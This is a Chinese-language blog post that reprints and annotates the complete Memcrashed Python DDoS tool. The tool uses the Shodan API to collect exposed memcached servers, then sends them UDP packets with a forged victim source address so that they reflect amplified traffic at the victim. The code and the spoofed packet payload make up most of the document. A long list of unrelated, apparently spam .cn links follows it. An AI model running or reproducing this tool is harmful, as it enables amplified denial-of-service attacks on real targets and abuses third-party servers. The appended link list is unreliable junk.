审核Memcrashed Drdos攻击代码
0x00前言:
距离世界上最大的Drdos攻击已经过去了两个星期左右
昨天在交流的时候。群友在Github中找到了exploit。
0x01开始:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
|
#-- coding: utf8 --#!/usr/bin/env python3import sys, os, time, shodan #导入sys,shodan,os,time模块
from pathlib import Path #从pathlib模块中导入Path
from scapy.all import * #导入scapy
from contextlib import contextmanager, redirect_stdout #从contextlib模块中导入 contextmanager, redirect_stdout
starttime = time.time() #设置时间点
@contextmanagerdef suppress_stdout():
with open(os.devnull, "w") as devnull: #不同设备下的null路径
with redirect_stdout(devnull):
yield
class color:
HEADER = '\033[0m' #背景颜色字符串
keys = Path("./api.txt") #搜索API.txt
logo = color.HEADER + ''' #好看的标题
███╗ ███╗███████╗███╗ ███╗ ██████╗██████╗ █████╗ ███████╗██╗ ██╗███████╗██████╗
████╗ ████║██╔════╝████╗ ████║██╔════╝██╔══██╗██╔══██╗██╔════╝██║ ██║██╔════╝██╔══██╗
██╔████╔██║█████╗ ██╔████╔██║██║ ██████╔╝███████║███████╗███████║█████╗ ██║ ██║
██║╚██╔╝██║██╔══╝ ██║╚██╔╝██║██║ ██╔══██╗██╔══██║╚════██║██╔══██║██╔══╝ ██║ ██║
██║ ╚═╝ ██║███████╗██║ ╚═╝ ██║╚██████╗██║ ██║██║ ██║███████║██║ ██║███████╗██████╔╝
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝╚═════╝
Author: @037
Version: 3.2
####################################### DISCLAIMER ########################################| Memcrashed is a tool that allows you to use Shodan.io to obtain hundreds of vulnerable || memcached servers. It then allows you to use the same servers to launch widespread || distributed denial of service attacks by forging UDP packets sourced to your victim. || Default payload includes the memcached "stats" command, 10 bytes to send, but the reply || is between 1,500 bytes up to hundreds of kilobytes. Please use this tool responsibly. || I am NOT responsible for any damages caused or any crimes committed by using this tool. |########################################################################################### '''print(logo) #输出好看的标题 = =
if keys.is_file(): #如果路径下有这个文件的话
with open('api.txt', 'r') as file: #读取API.txt
SHODAN_API_KEY=file.readline().rstrip('\n') #每行读取删除换行符
else: #如果没有这个文件
file = open('api.txt', 'w') #新建API.txt
SHODAN_API_KEY = input('[*] Please enter a valid Shodan.io API Key: ') #等待用户输入
file.write(SHODAN_API_KEY) #写入用户输入的东西
print('[~] File written: ./api.txt') #这个就不说了 = =
file.close() #关闭文件
while True:
api = shodan.Shodan(SHODAN_API_KEY) #你的shodan Key
print('') #= =
try:
myresults = Path("./bots.txt") #搜索bots.txt
query = input("[*] Use Shodan API to search for affected Memcached servers? <Y/n>: ").lower() #等待用户输入,将输入转化为小写
if query.startswith('y'): #如果用户输入的是y
print('')
print('[~] Checking Shodan.io API Key: %s' % SHODAN_API_KEY)
results = api.search('product:"Memcached" port:11211') #从shodan中搜索Memcached服务,并且端口是11211的
print('[✓] API Key Authentication: SUCCESS')
print('[~] Number of bots: %s' % results['total'])
print('')
saveresult = input("[*] Save results for later usage? <Y/n>: ").lower() #等待用户输入,将输入转化为小写
if saveresult.startswith('y'): #如果是y
file2 = open('bots.txt', 'a') #打开bots.txt
for result in results['matches']: #变量shodan搜索到的结果
file2.write(result['ip_str'] + "\n") #将搜索到的IP写入bots.txt
print('[~] File written: ./bots.txt')
print('')
file2.close() #关闭文件
saveme = input('[*] Would you like to use locally stored Shodan data? <Y/n>: ').lower() #等待用户输入将输入的转为小写
if myresults.is_file(): #如果路径下有bots.txt
if saveme.startswith('y'): #用户输入为y
with open('bots.txt') as my_file: #读取bots.txt
ip_array = [line.rstrip() for line in my_file] #读取IP
else: #如果路径下没有这个txt
print('')
print('[✘] Error: No bots stored locally, bots.txt file not found!')
print('')
if saveme.startswith('y') or query.startswith('y'): #两个任意一个为y的话
print('')
target = input("[▸] Enter target IP address: ") #等待用户输入
power = int(input("[▸] Enter preferred power (Default 1): ") or "1")
data = input("[▸] Enter payload contained inside packet: ") or "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"
print('')
if query.startswith('y'): #如果输入为y的话
iplist = input('[*] Would you like to display all the bots from Shodan? <Y/n>: ').lower() #等待输入
if iplist.startswith('y'): #输入为y的话
print('')
counter= int(0)
for result in results['matches']: #遍历shodan搜索的结果
host = api.host('%s' % result['ip_str']) #输入IP
counter=counter+1
print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, result['ip_str'], host.get('os', 'n/a'), host.get('org', 'n/a')))
time.sleep(1.1 - ((time.time() - starttime) % 1.1))
if saveme.startswith('y'): #为y的话
iplistlocal = input('[*] Would you like to display all the bots stored locally? <Y/n>: ').lower() #等待输入
if iplistlocal.startswith('y'): #输入为y的话
print('')
counter= int(0)
for x in ip_array:
host = api.host('%s' % x)
counter=counter+1
print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, x, host.get('os', 'n/a'), host.get('org', 'n/a')))
time.sleep(1.1 - ((time.time() - starttime) % 1.1)) #延迟一秒钟,并减去开始的时间
print('')
engage = input('[*] Ready to engage target %s? <Y/n>: ' % target).lower() #等待用户输入
if engage.startswith('y'): #如果为y
if saveme.startswith('y'): #如果为y
for i in ip_array: #遍历ip_array
if power>1: #如果power大于1
print('[+] Sending %d forged UDP packets to: %s' % (power, i))
with suppress_stdout():
send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power)
elif power==1:#如果power等于1
print('[+] Sending 1 forged UDP packet to: %s' % i)
with suppress_stdout():
send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power) #伪造自己的源IP向Memcrashed发送数据
else: #如果两个都不是
for result in results['matches']:
if power>1: #如果power大于1
print('[+] Sending %d forged UDP packets to: %s' % (power, result['ip_str']))
with suppress_stdout():
send(IP(src=target, dst='%s' % result['ip_str']) / UDP(dport=11211)/Raw(load=data), count=power) #伪造自己的源IP发送数据
elif power==1: #如果power等于1
print('[+] Sending 1 forged UDP packet to: %s' % result['ip_str'])
with suppress_stdout():
send(IP(src=target, dst='%s' % result['ip_str']) / UDP(dport=11211)/Raw(load=data), count=power) #伪造自己的源IP发送数据
print('')
print('[•] Task complete! Exiting Platform. Have a wonderful day.')
break
else:
print('')
print('[✘] Error: %s not engaged!' % target)
print('[~] Restarting Platform! Please wait.')
print('')
else:
print('')
print('[✘] Error: No bots stored locally or remotely on Shodan!')
print('[~] Restarting Platform! Please wait.')
print('')
except shodan.APIError as e:
print('[✘] Error: %s' % e)
option = input('[*] Would you like to change API Key? <Y/n>: ').lower() #等待输入
if option.startswith('y'): #如果为y
file = open('api.txt', 'w') #新建api.txt
SHODAN_API_KEY = input('[*] Please enter valid Shodan.io API Key: ') #输入您的shodan可以
file.write(SHODAN_API_KEY) #加入到文件
print('[~] File written: ./api.txt')
file.close() #关闭文件
print('[~] Restarting Platform! Please wait.')
print('')
else: #如果不是
print('')
print('[•] Exiting Platform. Have a wonderful day.')
break
|
向Memcrashed发送的数据: \x00\x00\x00\x00\x00\x01\x00\x00stats\r\n
Memcrashed exploit地址:https://github.com/649/Memcrashed-DDoS-Exploit
0x02分析完代码获取到的思路:
1.从shodan中获取开放了11211的Memcrashed的服务的IP
2.遍历shodana获取到的IP写入到文件
3.遍历写人IP的文件
4.伪造源IP向遍历的IP发送数据:\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n
http://www.huh0545.cn/
http://www.kgg2505.cn/
http://www.dhg3119.cn/
http://www.azd6793.cn/
http://www.vuf7734.cn/
http://www.ums9455.cn/
http://www.dli5822.cn/
http://www.rik3314.cn/
http://www.arf0717.cn/
http://www.dsx1888.cn/
http://www.dsd3012.cn/
http://www.pur5137.cn/
http://www.fsj6077.cn/
http://www.tvz4241.cn/
http://www.qndfr.org/
http://www.zcshr.org/
http://www.fnfdf.cc/
http://www.taoshun1688.com/
http://www.unuu6393.cn/
http://www.ebll4793.cn/
http://www.wzxw0148.cn/
http://www.jknp6659.cn/
http://www.eaxv3478.cn/
http://www.enyy1947.cn/
http://www.vcqr8578.cn/
http://www.pbss8753.cn/
http://www.gwvq8861.cn/
http://www.taum0602.cn/
http://www.wuoe3708.cn/
http://www.spyb0748.cn/
http://www.jbxu3084.cn/
http://www.eami4345.cn/
http://www.zzyb6904.cn/
http://www.wead0122.cn/
http://www.iyld2675.cn/
http://www.yeex2195.cn/
http://www.fgro9441.cn/
http://www.kvvz4431.cn/
http://www.uuza3384.cn/
http://www.yyvw5376.cn/
http://www.keej8837.cn/
http://www.izpt4079.cn/
http://www.pawt8491.cn/
http://www.tagg4453.cn/
http://www.zunr6962.cn/
http://www.bbbv0837.cn/
http://www.cigo1908.cn/
http://www.ghkd7086.cn/
http://www.dynl6229.cn/
http://www.qvaa7038.cn/
http://www.klkz4599.cn/
http://www.gjsx9410.cn/
http://www.chnp3876.cn/
http://www.evkj6051.cn/
http://www.evsv0341.cn/
http://www.hvox0584.cn/